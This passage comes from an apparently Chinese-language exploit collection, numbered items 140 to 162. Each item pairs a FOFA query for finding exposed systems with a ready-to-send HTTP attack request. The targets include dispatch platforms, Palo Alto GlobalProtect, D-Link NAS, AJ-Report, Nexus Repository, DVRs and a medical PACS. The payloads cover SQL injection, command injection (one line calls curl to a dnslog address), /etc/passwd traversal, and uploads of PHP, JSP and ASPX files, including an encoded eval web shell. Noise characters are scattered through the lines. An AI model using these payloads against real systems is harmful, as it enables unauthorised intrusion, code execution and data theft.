% g7 |2 O8 Z# v0 R$ ?5 H2 \( P" p2 m. E0 z% f; T
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
( d( y; t% C& q7 LCVE-2024-25667 L9 l' N& ]" }, r3 Y R: p
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"4 {& S" k7 ]" P0 f7 |* |0 ?
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1& s" I+ I4 U: p" X! h; _+ ^ j# b0 C
Host: x.x.x.x0 G. b5 w1 \4 e7 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
E3 d" F& N5 u5 y+ o0 X5 k& ~2 \+ DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! w! Q+ R% l, F8 o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! G. X3 {: Z9 ?" f2 F
Accept-Encoding: gzip, deflate, br X" `. k9 p8 w; D4 g- n
Connection: close7 |; J$ t& Y. S- W) }! U, h
Cookie: authcode=h8g9
- V3 Z5 i, U. \6 m* X. QUpgrade-Insecure-Requests: 18 @9 q4 Y3 B/ v! H- v8 {( D% |
1 t7 h8 T. V# M
! I4 e) K, a6 L5 |141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
6 R n# x2 `. u' i* YFOFA:body="指挥调度管理平台"
' c2 @2 H0 v9 K+ O% s* W+ P' Q6 HPOST /app/ext/ajax_users.php HTTP/1.1
9 z& u* N/ X K MHost: your-ip8 Z# B, F& G1 f1 r, d; p2 K0 V+ l
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info$ ~7 H9 [7 k' R2 e$ `- f
Content-Type: application/x-www-form-urlencoded
% ^* P, V$ P' a* Y/ s0 |) j" m3 ^' L
3 C# }- M6 w% R- e* F+ X' B8 G! i
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
5 z' n8 r. r" m9 z N# s0 e# D9 T8 w+ m1 E: u* |8 N( L; @, Z
; D- |) K$ l2 K2 g& _
142. CMSV6车辆监控平台系统中存在弱密码. j1 o- r C8 t# e/ b9 \# v, s
CVE-2024-29666
& v$ w6 G$ k# rFOFA:body="/808gps/"
1 X0 o H+ u$ {$ u" Oadmin/admin; e/ m2 f- R* d0 y" t! b
143. Netis WF2780 v2.1.40144 远程命令执行* u$ H4 k7 O$ u5 M8 |* k) g: ?! U5 m4 g, G
CVE-2024-25850/ g; d# Z# V& k2 S# M5 h5 _4 w
FOFA:title='AP setup' && header='netis' b8 |$ U* }# y( O
PAYLOAD
' R, }3 z- z( j! v
# Z' O3 R5 Y! O9 z144. D-Link nas_sharing.cgi 命令注入" q' A' g' F, P- N3 P" K( ^
FOFA:app="D_Link-DNS-ShareCenter"; g! ^9 T2 r. H/ t0 a3 v
system参数用于传要执行的命令
: z& j8 \( I4 A" eGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
# j- e" L1 w/ P$ [+ l" ~Host: x.x.x.x
) ~# G. Y$ d: Y" p+ DUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0/ l& C3 Q, U g' }7 O
Connection: close: Z* P; x" L+ K
Accept: */*! a* A( X0 B! ]9 n3 Q
Accept-Language: en5 I f/ B7 W0 `8 B* q9 p
Accept-Encoding: gzip
' _2 {+ w2 A2 R: r; x5 S0 b8 }/ o1 [3 t0 n! H B0 j/ g* x( E
; p5 t, f/ X3 ]( B& w145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
d; k' a& h/ cCVE-2024-34000 J* B% O. A" l: x* B& q% w+ d
FOFA:icon_hash="-631559155"
9 ~0 S; S$ Y' a) A5 b1 tGET /global-protect/login.esp HTTP/1.1
( f7 @! b- l# K6 A! MHost: 192.168.30.112:10053 N# J; u0 p: K2 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84" P- L. i% n2 b
Connection: close
/ a' ~3 k6 f5 k1 a0 z# ?* rCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;" q, d7 y2 s( V, q# o; X
Accept-Encoding: gzip
) v( G0 p8 m( g, }; J0 s
8 z0 l+ S' d2 y, Q" K$ q
, S$ Z/ A; d0 y, }+ j+ K C% s146. MajorDoMo thumb.php 未授权远程代码执行1 J+ A7 T) N- x/ ^
CNVD-2024-02175
; o' n! ?5 i. qFOFA:app="MajordomoSL"
6 Z5 P' f# p: v @; r O. }# ~GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1( v5 d% I1 G4 f$ [' h9 B9 [7 G: X
Host: x.x.x.x
7 u7 S" w& ]9 D' V1 R# A2 S: e- zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
% _3 r; e/ k% h- {, ?3 ^Accept-Charset: utf-8
6 Z, Q/ i" K! A3 q B; EAccept-Encoding: gzip, deflate$ k3 q% U e' O- Y! E& O
Connection: close" j1 a+ u5 A9 ?0 B6 B) k
6 a: p& [4 Y0 l* A5 [, o
& S; |) s2 l# G; H/ Q) ]; W* p: U147. RaidenMAILD邮件服务器v.4.9.4-路径遍历% S5 R0 p$ ?, q4 e
CVE-2024-32399. \% G# h$ P2 u
FOFA:body="RaidenMAILD"2 k7 N1 {9 O! Z, Z
GET /webeditor/../../../windows/win.ini HTTP/1.1
+ X" Y$ G; c( @9 V; X% QHost: 127.0.0.1:816 v* t K& {% S
Cache-Control: max-age=0
" B' p2 U$ d3 |" XConnection: close7 r! ^ ~" p: g3 ~8 [' g W( s9 l/ d6 S
" K) D/ F4 z* a# h6 @, y4 G* R* A; x" l7 A, ^9 l
148. CrushFTP 认证绕过模板注入; R5 c- j( i7 X& k
CVE-2024-4040: s4 r2 S7 f& M6 q, G6 s5 V( p) w
FOFA:body="CrushFTP"9 ^+ P" A$ q) x( J9 o* ]
PAYLOAD) Q+ D( j' ^- U; z
0 O" A5 r/ a* \149. AJ-Report开源数据大屏存在远程命令执行
6 L9 e2 e9 G$ E4 M. ~- L) ?- {FOFA:title="AJ-Report", U; H5 u" C3 V* m
+ ~1 C M7 z9 S, Q5 w* ZPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1* B8 R' H: J) O+ M b3 U0 x. l2 s1 X
Host: x.x.x.x
& z. G* \2 v1 [$ R2 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 ?1 r/ {) C/ i2 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 j6 d+ Y. L1 J( U2 ~
Accept-Encoding: gzip, deflate, br3 s6 Y% c' i9 m# a6 v4 O- }
Accept-Language: zh-CN,zh;q=0.9
5 t2 M5 g6 t/ w& _5 b6 s MContent-Type: application/json;charset=UTF-8
: B) c) z" }2 hConnection: close3 ?9 t8 @, w4 y- R" R8 ]/ s
% }# r" k' q$ d) d6 C$ w! Q{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}/ r% e+ {5 d* q
* G: M& i9 ~+ n0 m7 S0 {! V/ p
150. AJ-Report 1.4.0 认证绕过与远程代码执行
6 J% F* K$ O* ?0 vFOFA:title="AJ-Report"6 p; ^5 {: ]' B8 H3 ~( J
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1" B2 s' L4 U" Y3 I: A
Host: x.x.x.x. m5 O! I3 w) V" m( [, R$ ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+ D: |3 w2 A7 i: rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% \" c @4 R6 V
Accept-Encoding: gzip, deflate, br
) N/ ^! a# l( W W4 Z7 t: J, GAccept-Language: zh-CN,zh;q=0.9
& M2 D1 G1 U }7 z1 U+ w: Y G9 M$ UContent-Type: application/json;charset=UTF-85 y2 }* @6 [# p/ Q W
Connection: close& m, o- Y4 T: _4 a. g) K9 W
Content-Length: 339
% M$ K$ l- H+ V7 o1 H' H$ Q/ q3 p# \8 f/ W/ H3 B5 |9 K% }7 T3 b
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
) M. ~5 T, I& U9 k& ?6 t9 e8 j. a, y& {
% ]- B# ?6 V1 y* `9 N# A8 |: ~
" Z; j" m) O1 N4 L3 w+ m- y2 |151. AJ-Report 1.4.1 pageList sql注入) t, I1 B) [2 c$ X# R$ z9 R+ c
FOFA:title="AJ-Report"
3 m3 ~2 P2 G2 E, g+ SGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
) s% m ^. ^# e9 W) cHost: x.x.x.x
. \5 \' ~( E: |& y( O3 fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: w m4 S$ V& ]% HConnection: close' J9 _' N* M' W! Y5 [
Accept-Encoding: gzip
, ~7 |: x" Y" R' z$ n2 c# O9 Y8 H) \# }1 Z' T
. G- ~% c9 B3 H1 b6 ?" f( y
152. Progress Kemp LoadMaster 远程命令执行
& ^' Q [- T& R7 c. rCVE-2024-1212( v3 t4 F: K" J) f+ a
LoadMaster <= 7.2.59.2 (GA)
: }. }# ]1 j) C) h5 H0 F: ~! VLoadMaster<=7.2.54.8 (LTSF)
8 b& D6 j6 M( H% {- `) {3 LLoadMaster <= 7.2.48.10 (LTS)- j9 K/ U& s; l% Q7 P
FOFA:body="LoadMaster". [: Q+ x% p* b
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
7 ^+ ?' I$ n, } O; Y) IGET /access/set?param=enableapi&value=1 HTTP/1.1
' C* d/ a0 k$ Q' ^$ tHost: x.x.x.x0 c" g; H1 {/ I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
" g9 q! e. m. y' w& |7 |Connection: close1 Q; T: N# Y) P- B9 F0 Y9 Y8 R9 Y
Accept: */*
1 b& o5 P' S6 p) @! T2 x: rAccept-Language: en
* k, Z8 S9 z7 yAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=- v0 D6 x/ S7 Y. d. M
Accept-Encoding: gzip
8 x" z7 [5 x4 e/ i+ y C8 v+ A' |# h7 s% B# w# q$ V+ u; n+ ]9 S. F9 y
3 Z, ^! f7 k' c153. gradio任意文件读取1 Q U& l% l8 l8 B9 b
CVE-2024-1561FOFA:body="__gradio_mode__"! v3 `# Y, k4 D# ]1 ]/ e' Q( Y
第一步,请求/config文件获取componets的id3 f3 ]( h5 M* X: `0 e/ R/ k! S
http://x.x.x.x/config) }% x$ Z& @, p
( X: G% C" A9 @3 N" O: a7 _7 G9 h" Q6 y7 h# a$ y
第二步,将/etc/passwd的内容写入到一个临时文件
- u% s) C* U$ ~) ]7 L, D3 dPOST /component_server HTTP/1.1 ~+ k6 o( R* e6 w
Host: x.x.x.x7 \5 _. v, z7 c" u0 u% n5 S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3/ ^/ o, P: d; [: P0 W& A' }5 p
Connection: close
5 H8 Y/ n: M3 PContent-Length: 115
! Y' x3 D2 U) f1 H% o7 WContent-Type: application/json
9 H$ k' C1 I% M& ~Accept-Encoding: gzip
5 N* \ d/ k# f+ |. ~' q4 q; E) f3 ^; K: l
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
6 k/ R& ~ q6 |. N2 r. h1 Q1 l* M7 m" \5 d& g4 z [
9 K/ E# P [4 h' x s% `
第三步访问" [& C" R8 I$ e" I) V8 o
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd- i" N/ ~( Z3 r) Q" x$ D# `
9 P G* z# E6 S6 [* Z8 q/ t: D1 u9 |' S8 @/ r9 E' j% R
154. 天维尔消防救援作战调度平台 SQL注入
) s) \6 }! \! i* JCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入": w- _5 Y4 w4 g+ p
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
# D; y/ K- I# Y$ wHost: x.x.x.x8 @6 E, a6 y9 Y- e% `
Content-Length: 1062 K: I* v1 e2 t' z Y
Cache-Control: max-age=0
6 s& c+ J" [7 y- |' k0 Q% z5 o9 Q. DUpgrade-Insecure-Requests: 1
' {$ A( J, z5 `' N6 ~% aOrigin: http://x.x.x.x6 y/ u+ ]' f9 S! V! d3 c
Content-Type: application/json
! p8 M2 I+ h9 h, z5 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
! v) m: O! k; U7 C3 M- x3 KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 F) w: b" C) \1 b9 d
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
1 L( U! W; X9 t9 z4 ~Accept-Encoding: gzip, deflate
; N1 \/ d- _7 ~# _* d" [! CAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
; B j9 T9 \- p$ k9 GConnection: close
- y/ l, j6 i8 A; ?: \2 h, K( O; x. h
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}, n$ v" h/ x9 V. X! V: e
( g( e4 e- I7 `+ u6 u! {
6 ]9 {& b: i" ]) K9 w
155. 六零导航页 file.php 任意文件上传
3 m& W0 A! K( O# W$ f0 dCVE-2024-349824 ?3 }0 \3 O1 w0 a; J. {
FOFA:title=="上网导航 - LyLme Spage"
3 X6 g" Z# l. b+ k4 Z, P3 }POST /include/file.php HTTP/1.1
1 W4 _9 W. O7 h7 E% V3 iHost: x.x.x.x `: E6 y4 V1 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.02 ^$ C$ Z; Y5 C' n% u' |
Connection: close
2 K! ~" Y& l7 y7 ?0 lContent-Length: 232
0 A) }% c- g. o" v( d. o, l: `8 QAccept: application/json, text/javascript, */*; q=0.01- A. Q& H9 a" B. N+ I
Accept-Encoding: gzip, deflate, br6 w" g r0 o) _( ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 H( x$ D& X1 `) y U- K G
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f+ k O+ h3 |3 j' `& N
X-Requested-With: XMLHttpRequest9 G0 v6 \; f# k7 Z
* W" C6 m" _6 s! {- u$ u2 b8 E3 U
-----------------------------qttl7vemrsold314zg0f% N4 `* ^0 G& e. T5 k: z" Q
Content-Disposition: form-data; name="file"; filename="test.php"
$ t7 X# U9 j, D& rContent-Type: image/png
R6 |$ Y) o3 T! z- S, S- e, g p6 q8 T5 T# f. K) {5 X/ C$ V
<?php phpinfo();unlink(__FILE__);?>
+ Q0 ~3 g3 A( C-----------------------------qttl7vemrsold314zg0f--
3 D# D5 ]$ e, S# j- B" R; u2 Q; j1 e0 @8 C* |
% z, H" I, H1 N3 S1 K1 j
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
9 i3 m/ @- G# f& k
1 @( ~% V3 R! r5 L156. TBK DVR-4104/DVR-4216 操作系统命令注入
% O& E) h# A8 N0 j, |CVE-2024-37213 N! ]$ n. J! }% ?" R
FOFA:"Location: /login.rsp"' x1 p& b. O# @" _* N2 g3 ]
·TBK DVR-4104/ p/ z. m* E( A
·TBK DVR-4216
# J3 N- a. g _curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"/ V" `; r8 G3 ?7 r4 z
1 K" }6 d2 F" n
/ o* F8 V, D0 v9 K" W. n1 Y2 EPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.15 {" \6 [: N) Y# @* f6 `9 D" `
Host: x.x.x.x
! g- l* H$ o! i4 v8 I3 Z8 nUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 D8 u# R9 n! m9 z% ?
Connection: close, E5 z2 J2 e% Y& H7 Z
Content-Length: 0
! {2 H* k( v! i7 R$ T; [2 ~7 vCookie: uid=1
4 D, i1 p. ]: X) S$ GAccept-Encoding: gzip' J" L0 Z8 Q3 Q( t; o" w) S' ^
2 P6 ]6 F! J4 L! V% `) N6 m# G
" c, Y* H9 \6 h0 q6 [/ w157. 美特CRM upload.jsp 任意文件上传
( H9 ?, E* U: PCNVD-2023-06971
# n& T1 S0 z1 x4 @- I. f: j. t" {FOFA:body="/common/scripts/basic.js": o1 @) ]0 c1 N5 b
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
- s$ q8 F/ q/ C# ?2 oHost: x.x.x.x* H. J7 I8 a5 z6 O! \" J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.363 ^( `& k/ j2 p w
Content-Length: 709! Y6 Z. j# Z2 M; l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 f4 R3 A0 w; o8 E7 ZAccept-Encoding: gzip, deflate
2 Q5 O# u2 s! mAccept-Language: zh-CN,zh;q=0.9
+ K8 ]' ^; ^6 B* ^8 Y5 I6 H8 a5 w2 iCache-Control: max-age=0
! F2 [& H# ?0 d1 SConnection: close7 \3 V. x9 d% X( m& v# N
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
* Y) ]- ], \5 T) M1 Y( fUpgrade-Insecure-Requests: 1
# m, Q5 X: V1 P3 C, t+ n$ G
# w) v+ s+ ~$ S/ a u/ F: Q- d5 l------WebKitFormBoundary1imovELzPsfzp5dN
1 ]& _( z* T6 F; e% }Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"+ D7 n" a# f/ \, Y
Content-Type: application/octet-stream1 L! T# p; R$ c
1 \+ a. U6 P; x- e# M7 J: D; Jnyhelxrutzwhrsvsrafb
, J N& q; j; T8 q7 D) s------WebKitFormBoundary1imovELzPsfzp5dN1 F$ D: K- I" c7 g2 [, ?0 \. i* e* u$ \
Content-Disposition: form-data; name="key"4 j3 q' C, X, V8 P' ~4 [
% [; o: J* ` q( @6 b% t( l
null
" H; ?8 [& R( O& C) |------WebKitFormBoundary1imovELzPsfzp5dN9 h! n! ]2 H c, K M% y5 G
Content-Disposition: form-data; name="form"
$ t$ I* d' K( \# S3 x I; ^) m5 h1 h$ f8 b
null
% R0 V$ T% p0 |------WebKitFormBoundary1imovELzPsfzp5dN
! m8 ^ A7 T* \* ~7 N, n h, |+ P; k2 QContent-Disposition: form-data; name="field"3 C8 c% x A7 ~1 {9 i# o7 Q
9 K3 l7 F' }- P" h5 x+ L e6 j! M
null- W5 T) [7 X8 y* t7 F. @. K8 M# m
------WebKitFormBoundary1imovELzPsfzp5dN
8 }. P( S$ K3 G+ i) z# ~! |Content-Disposition: form-data; name="filetitile"
m& o0 C4 M4 m8 I, z- y2 J
# ?2 {! i( Q) Nnull. k5 C* o; z9 M N0 U! Y4 T$ n
------WebKitFormBoundary1imovELzPsfzp5dN) L' Q* x& S2 k
Content-Disposition: form-data; name="filefolder"2 d$ g9 i6 T7 ~9 O# a
5 x. O6 x0 y3 x- g3 F5 v3 W1 `1 v
null
3 t3 |8 Y) c/ j1 _& r) A7 N* b------WebKitFormBoundary1imovELzPsfzp5dN--
/ z! s, ^: p4 W) }1 n" Y
# m; e. P* C5 T) A" G& Q5 o* f+ z9 ?* e+ }, ^3 @
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
0 x& R4 t5 L& f6 E
/ a, O9 j" I( _4 @158. Mura-CMS-processAsyncObject存在SQL注入, W1 Y7 p" n6 r
CVE-2024-32640
; o2 X/ q# d3 T4 rFOFA:"Generator: Masa CMS"/ K4 C9 ~3 u8 a' A% D6 p& H$ I: B
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1/ |! ?/ s6 M- R+ t ^* [3 ?1 y
Host: {{Hostname}}
: z4 Q3 Y% S6 c* j2 A5 m* r% kContent-Type: application/x-www-form-urlencoded5 I+ |8 O0 D$ x" Q* ] ~
5 v! `# P3 o7 j: [
object=displayregion&contenthistid=x\'&previewid=1
# E7 P M' w, x& d* c- Q1 \3 u K. s
5 R1 u/ }8 m0 ^( j159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传# W6 U& e: v- z/ C, u3 q
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")4 x. }# `- L+ n4 G/ d! R9 }- w4 _% s
POST /webservices/WebJobUpload.asmx HTTP/1.1
5 n9 X1 ?5 w7 c W; oHost: x.x.x.x
( v/ _1 U$ G- ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36, j" K) `0 m5 g+ m- T
Content-Length: 1080
% b" a* a1 D- \ ?9 S/ `Accept-Encoding: gzip, deflate Z! K, p" M* [3 h/ p
Connection: close
" ?% Z: o& g0 z, ?, n. ^Content-Type: text/xml; charset=utf-8* O6 d0 ^1 u- o' I/ h" a4 h
Soapaction: "http://rainier/jobUpload"- o1 g k' ~3 y- }8 C9 |
+ J1 O1 O8 c' s5 X( o( X8 A: ]
<?xml version="1.0" encoding="utf-8"?>6 B# }) T0 h, K- v1 u! A. _9 E7 ?
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
( |# h- A* m8 h" P<soap:Body>
4 ~5 e# {6 w/ x, k" x1 T' R<jobUpload xmlns="http://rainier">
: W& q6 N4 I2 b4 [; f" z<vcode>1</vcode>( `8 o8 J4 |, ?
<subFolder></subFolder>
/ W8 C6 q" F5 E/ W0 v/ y<fileName>abcrce.asmx</fileName>* I0 [' H( g4 S/ ^: }# _
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>$ g7 T. v$ y1 O6 W7 U; @0 r
</jobUpload>
& t7 X3 X# F5 V) r; t H</soap:Body>
: u, Q8 k3 e* V: i4 c, ]! B2 u</soap:Envelope>3 ~+ Z/ G" U$ z/ P
( i- J: | L" l' [' q5 I- I: s: _' o
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")! d) J0 h; l& U O
' o$ r) K# Z# s& Q' k
5 `: R# Z% t7 V) T% u
160. Sonatype Nexus Repository 3目录遍历与文件读取
. s: E+ H$ ^) o$ v9 o4 n* }/ {% PCVE-2024-4956. G, a+ Z; X" W" J* T
FOFA:title="Nexus Repository Manager"3 b& d1 k* X( V7 b$ W( C
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1' V, Y+ \5 U- f# r! v
Host: x.x.x.x0 }- [( j% @9 l# Q
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
! M; I3 d2 ?4 b+ ^$ E& f8 X ^7 |Connection: close9 m$ N! `: }- B/ y' T
Accept: */*. {3 o* [3 n5 ?- u* U' a$ N
Accept-Language: en
$ P+ }8 u' k/ T! fAccept-Encoding: gzip3 o1 L- [, Y- f" K. X9 m
; _% o8 g- V) D V. K( A3 q6 W8 m' i' X: X- R
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
3 u7 T8 _; ^) i TFOFA:body="/KT_Css/qd_defaul.css"+ x5 j/ z, ~5 T2 i0 y
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
" |) S. T# W: _3 R9 a! UPOST /Webservice.asmx HTTP/1.1
% y' Q; t- G$ `0 m& BHost: x.x.x.x
& U: v" S0 K+ D" {( BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
* v3 {, q) t' ?& Y7 pConnection: close& I/ w' q B- Q' v9 g
Content-Length: 445
7 y1 ]/ }2 Y, z* SContent-Type: text/xml; D+ z' C' @% E" q3 X# I
Accept-Encoding: gzip# G5 i- D5 n/ R4 E
+ |% o* k8 i& G2 v) Y$ K<?xml version="1.0" encoding="utf-8"?>/ _! C9 q7 i# e" `4 d
<soap:Envelope xmlns:xsi=") ~% `- n" m; z* G! P1 ^& z
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
2 G1 r: d+ A1 {$ L9 Hxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
3 T' e. C8 U" N/ ~6 ~1 z<soap:Body>
$ k* z7 w0 F2 q* a6 R<UploadResume xmlns="http://tempuri.org/">) x! L7 Y3 m! \8 ?
<ip>1</ip>
! f7 Z1 C6 {. k! p" B: h<fileName>../../../../dizxdell.aspx</fileName># a3 q8 w! v3 K: _
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>1 q; {1 F8 {- {" h
<tag>3</tag>( {9 S3 ~* U: [/ A. |) p& D( q5 y
</UploadResume>5 I k8 @" g# c$ c0 j# u
</soap:Body>* u w( A8 O3 K+ R% [
</soap:Envelope>
) {: Y! H/ d h( ?1 h# Q# I# |5 o
6 O; Q: \5 R0 m" N/ q$ N5 z- K! H4 r
http://x.x.x.x/dizxdell.aspx
7 W" b0 Q- m/ ]1 `
" q0 c3 o( w6 b2 w, |162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
, [! ^6 W& }6 ]" o0 v r. EFOFA: app="和丰山海-数字标牌"" L% k. r5 y! d" W" R
POST /QH.aspx HTTP/1.1* L; l8 L! g \ z w
Host: x.x.x.x
